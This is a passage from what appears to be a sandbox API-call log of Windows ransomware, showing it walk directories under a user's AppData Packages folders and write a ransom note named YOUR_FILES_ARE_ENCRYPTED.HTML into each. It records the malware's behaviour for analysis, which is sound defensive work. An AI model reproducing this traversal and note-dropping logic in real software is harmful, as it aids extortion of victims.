(in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0115.940] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.941] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\SystemAppData") returned 97 [0115.941] GetProcessHeap () returned 0x600000 [0115.941] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.942] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\SystemAppData" [0115.942] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\SystemAppData\\*" [0115.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.942] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0115.942] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0115.942] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.943] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0115.943] GetProcessHeap () returned 0x600000 [0115.943] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.944] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.945] CloseHandle (hObject=0x32c) returned 1 [0115.946] GetProcessHeap () returned 0x600000 [0115.946] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.946] GetProcessHeap () returned 0x600000 [0115.946] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.946] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0115.946] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.946] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\TempState") returned 93 [0115.946] GetProcessHeap () returned 0x600000 [0115.946] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.946] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\TempState" [0115.946] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\TempState\\*" [0115.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.946] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0115.946] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0115.946] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.946] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0115.947] GetProcessHeap () returned 0x600000 [0115.947] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.947] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.948] CloseHandle (hObject=0x32c) returned 1 [0115.949] GetProcessHeap () returned 0x600000 [0115.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.949] GetProcessHeap () returned 0x600000 [0115.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.950] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0115.950] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0115.950] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0115.950] GetProcessHeap () returned 0x600000 [0115.950] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.952] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0115.953] CloseHandle (hObject=0x214) returned 1 [0115.953] GetProcessHeap () returned 0x600000 [0115.953] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.953] GetProcessHeap () returned 0x600000 [0115.953] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0115.955] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.LockApp_cw5n1h2txyewy", cAlternateFileName="MICROS~1.LOC")) returned 1 [0115.955] StrStrIW (lpFirst="Microsoft.LockApp_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.955] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy") returned 80 [0115.955] GetProcessHeap () returned 0x600000 [0115.955] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0115.956] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy" [0115.956] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\*" [0115.956] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.958] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62848d25, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0115.958] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0115.958] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.958] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC") returned 83 [0115.958] GetProcessHeap () returned 0x600000 [0115.959] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.959] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC" [0115.959] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\*" [0115.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.963] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.963] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0115.963] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.963] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCache") returned 93 [0115.963] GetProcessHeap () returned 0x600000 [0115.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.964] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCache" [0115.964] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCache\\*" [0115.964] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.965] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0115.965] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0115.965] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.966] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0115.966] GetProcessHeap () returned 0x600000 [0115.966] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.967] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.968] CloseHandle (hObject=0x324) returned 1 [0115.969] GetProcessHeap () returned 0x600000 [0115.969] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.969] GetProcessHeap () returned 0x600000 [0115.969] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.970] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0115.970] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.970] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCookies") returned 95 [0115.970] GetProcessHeap () returned 0x600000 [0115.970] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.972] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCookies" [0115.972] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCookies", 